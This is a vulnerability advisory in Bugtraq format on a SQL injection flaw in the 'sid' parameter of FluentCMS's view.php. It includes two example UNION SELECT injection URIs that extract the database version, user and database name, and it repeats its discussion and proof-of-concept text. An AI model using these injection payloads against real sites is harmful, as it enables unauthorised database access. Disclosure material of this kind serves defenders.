FluentCMS 'view.php' SQL Injection Vulnerability
BID:28965
Info
FluentCMS 'view.php' SQL Injection Vulnerability
| Bugtraq ID: | 28965 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6642 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 28 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | cO2 |
| Vulnerable: |
DotContent FluentCMS 0 |
| Not Vulnerable: | |
Discussion
FluentCMS 'view.php' SQL Injection Vulnerability
FluentCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects unknown versions of FluentCMS. We will update this BID as more information emerges.
FluentCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects unknown versions of FluentCMS. We will update this BID as more information emerges.
Exploit / POC
FluentCMS 'view.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
http://www.example.com/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
http://www.example.com/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--